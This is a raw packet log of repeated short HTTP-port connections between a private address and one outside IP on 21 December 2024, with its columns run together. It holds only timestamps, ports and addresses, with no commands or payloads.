                                                                                                                                        Dec 21, 2024 10:08:07.732544899 CET4978680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:07.823915958 CET8049787185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:07.873136997 CET4978780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:07.912484884 CET8049786185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:07.966922045 CET4978680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:08.056799889 CET8049787185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:08.107511044 CET4978780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:08.266161919 CET4977280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:08.267441034 CET4978680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:08.267513037 CET4978780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:08.268228054 CET4979380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:08.387214899 CET8049786185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:08.387800932 CET8049793185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:08.387856960 CET8049787185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:08.387911081 CET4978680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:08.387967110 CET4979380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:08.388019085 CET4978780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:08.388258934 CET4979380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:08.507942915 CET8049793185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:08.734594107 CET4979380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:08.854165077 CET8049793185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:09.634753942 CET8049793185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:09.685678005 CET4979380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:09.872324944 CET8049793185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:09.920063972 CET4979380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:09.998826027 CET4979380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:09.999265909 CET4979980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:10.118783951 CET8049793185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:10.118868113 CET8049799185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:10.118868113 CET4979380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:10.118972063 CET4979980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:10.119189978 CET4979980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:10.238797903 CET8049799185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:10.467128992 CET4979980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:10.588979006 CET8049799185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:11.362685919 CET8049799185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:11.404391050 CET4979980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:11.597702026 CET8049799185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:11.638798952 CET4979980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:11.757514954 CET4979980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:11.758112907 CET4980580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:11.879621983 CET8049805185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:11.879726887 CET4980580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:11.879903078 CET4980580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:11.884862900 CET8049799185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:11.884927988 CET4979980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:11.999557972 CET8049805185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:12.233107090 CET4980580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:12.352710962 CET8049805185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:12.921382904 CET4980680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:12.921967983 CET4980580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:13.041804075 CET8049806185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:13.041944027 CET4980680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:13.042103052 CET4980680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:13.042561054 CET4980780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:13.043291092 CET8049805185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:13.043366909 CET4980580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:13.162810087 CET8049806185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:13.163986921 CET8049807185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:13.164211988 CET4980780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:13.164305925 CET4980780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:13.283907890 CET8049807185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:13.388961077 CET4980680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:13.508790016 CET8049806185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:13.508856058 CET8049806185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:13.514060974 CET4980780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:13.633871078 CET8049807185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:14.287543058 CET8049806185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:14.341938019 CET4980680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:14.425508022 CET8049807185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:14.482566118 CET4980780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:14.520258904 CET8049806185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:14.576250076 CET4980680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:14.664474010 CET8049807185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:14.716957092 CET4980780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:14.794517040 CET4980680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:14.794604063 CET4980780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:14.794831991 CET4981380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:14.914508104 CET8049813185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:14.914597988 CET4981380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:14.914724112 CET8049806185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:14.914807081 CET4981380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:14.914830923 CET4980680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:14.915375948 CET8049807185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:14.915446043 CET4980780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:15.034825087 CET8049813185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:15.263958931 CET4981380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:15.383490086 CET8049813185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:16.158515930 CET8049813185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:16.201353073 CET4981380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:16.393408060 CET8049813185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:16.394833088 CET4981380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:16.512723923 CET4981980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:16.514853954 CET8049813185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:16.517735004 CET4981380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:16.634587049 CET8049819185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:16.634675980 CET4981980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:16.634856939 CET4981980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:16.756964922 CET8049819185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:16.982619047 CET4981980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:17.165558100 CET8049819185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:17.894032001 CET8049819185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:17.935751915 CET4981980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:18.128541946 CET8049819185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:18.170064926 CET4981980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:18.260338068 CET4981980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:18.260581017 CET4982580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:18.380152941 CET8049825185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:18.380274057 CET4982580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:18.380384922 CET4982580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:18.380671978 CET8049819185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:18.380753994 CET4981980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:18.500029087 CET8049825185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:18.732736111 CET4982580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:18.852509975 CET8049825185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:19.530335903 CET4982580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:19.533720016 CET4982680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:19.629281998 CET8049825185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:19.629415035 CET4982580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:19.650470972 CET8049825185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:19.650588989 CET4982580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:19.653316021 CET8049826185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:19.653403997 CET4982680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:19.654561043 CET4982680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:19.655369997 CET4982780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:19.774162054 CET8049826185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:19.774852037 CET8049827185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:19.774920940 CET4982780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:19.775046110 CET4982780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:19.894584894 CET8049827185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:20.013884068 CET4982680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:20.123228073 CET4982780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:20.133578062 CET8049826185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:20.133723021 CET8049826185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:20.242876053 CET8049827185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:20.918703079 CET8049826185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:20.964167118 CET4982680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:21.036092997 CET8049827185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:21.091931105 CET4982780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:21.152442932 CET8049826185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:21.201340914 CET4982680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:21.272324085 CET8049827185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:21.326272011 CET4982780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:21.386457920 CET4982680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:21.386522055 CET4982780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:21.386873007 CET4983380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:21.506422043 CET8049826185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:21.506479025 CET8049833185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:21.506484985 CET4982680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:21.506556034 CET4983380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:21.506724119 CET4983380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:21.506804943 CET8049827185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:21.506860971 CET4982780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:21.626382113 CET8049833185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:21.857980967 CET4983380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:21.978360891 CET8049833185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:22.787072897 CET8049833185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:22.842093945 CET4983380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:23.024940014 CET8049833185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:23.076327085 CET4983380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:23.155529022 CET4983380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:23.155874014 CET4983980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:23.275383949 CET8049839185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:23.275470972 CET4983980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:23.276179075 CET8049833185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:23.276351929 CET4983380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:23.277998924 CET4983980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:23.397624969 CET8049839185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:23.623420000 CET4983980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:23.743185997 CET8049839185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:24.524425030 CET8049839185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:24.576281071 CET4983980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:24.760943890 CET8049839185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:24.810674906 CET4983980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:24.890858889 CET4983980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:24.891267061 CET4984580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:25.010965109 CET8049845185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:25.010979891 CET8049839185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:25.011038065 CET4983980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:25.011054993 CET4984580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:25.011260033 CET4984580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:25.130790949 CET8049845185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:25.357800961 CET4984580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:25.477377892 CET8049845185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:26.155205011 CET4984680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:26.155241013 CET4984580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:26.266170979 CET8049845185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:26.266263008 CET4984580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:26.276107073 CET8049846185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:26.276216984 CET4984680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:26.276355982 CET4984680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:26.276760101 CET8049845185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:26.276825905 CET4984580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:26.279778004 CET4984780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:26.395889997 CET8049846185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:26.399305105 CET8049847185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:26.399391890 CET4984780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:26.399558067 CET4984780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:26.519186974 CET8049847185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:26.623229980 CET4984680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:26.742852926 CET8049846185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:26.742904902 CET8049846185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:26.748275042 CET4984780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:26.867804050 CET8049847185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:27.547636986 CET8049846185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:27.591928005 CET4984680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:27.643635988 CET8049847185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:27.685775995 CET4984780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:27.784018040 CET8049846185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:27.826301098 CET4984680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:27.887470007 CET8049847185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:27.935683966 CET4984780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:28.014362097 CET4984680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:28.014448881 CET4984780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:28.014770031 CET4985380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:28.134193897 CET8049846185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:28.134299994 CET4984680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:28.134318113 CET8049853185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:28.134392977 CET4985380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:28.134578943 CET4985380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:28.134977102 CET8049847185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:28.135040998 CET4984780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:28.254045010 CET8049853185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:28.482656956 CET4985380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:28.680634975 CET8049853185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:29.383244038 CET8049853185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:29.435693979 CET4985380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:29.612422943 CET8049853185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:29.654444933 CET4985380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:29.734011889 CET4985380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:29.734487057 CET4985980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:29.854065895 CET8049853185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:29.854279995 CET4985380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:29.854351044 CET8049859185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:29.854413986 CET4985980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:29.854614973 CET4985980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:29.974069118 CET8049859185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:30.201577902 CET4985980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:30.321115971 CET8049859185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:31.118191004 CET8049859185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:31.170049906 CET4985980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:31.352412939 CET8049859185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:31.404423952 CET4985980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:31.481168032 CET4985980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:31.481494904 CET4986480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:31.601001978 CET8049864185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:31.601052046 CET8049859185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:31.601115942 CET4986480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:31.601135015 CET4985980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:31.601291895 CET4986480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:31.720804930 CET8049864185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:31.951368093 CET4986480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:32.071043015 CET8049864185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:32.795751095 CET4986480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:32.795803070 CET4986680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:32.848927975 CET8049864185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:32.848992109 CET4986480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:32.915477037 CET8049866185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:32.915572882 CET4986680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:32.915721893 CET4986680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:32.915954113 CET8049864185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:32.916007996 CET4986480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:32.927202940 CET4986880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:33.035459995 CET8049866185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:33.046901941 CET8049868185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:33.047060966 CET4986880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:33.047427893 CET4986880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:33.167133093 CET8049868185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:33.263979912 CET4986680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:33.383917093 CET8049866185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:33.383949995 CET8049866185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:33.404531956 CET4986880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:33.524353027 CET8049868185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:34.165041924 CET8049866185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:34.216949940 CET4986680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:34.293306112 CET8049868185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:34.342003107 CET4986880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:34.400398016 CET8049866185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:34.451419115 CET4986680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:34.534173012 CET8049868185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:34.576364994 CET4986880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:34.650444984 CET4986880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:34.650446892 CET4986680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:34.650731087 CET4987380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:34.770765066 CET8049873185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:34.770853043 CET8049868185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:34.770879984 CET4987380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:34.770910025 CET4986880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:34.771074057 CET4987380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:34.771261930 CET8049866185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:34.771327972 CET4986680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:34.891072989 CET8049873185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:35.123272896 CET4987380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:35.243030071 CET8049873185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:36.015894890 CET8049873185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:36.060769081 CET4987380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:36.248550892 CET8049873185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:36.295120001 CET4987380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:36.369900942 CET4987880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:36.492239952 CET8049878185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:36.492373943 CET4987880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:36.492584944 CET4987880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:36.614872932 CET8049878185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:36.842279911 CET4987880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:36.962088108 CET8049878185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:37.736613989 CET8049878185.230.138.58192.168.2.4
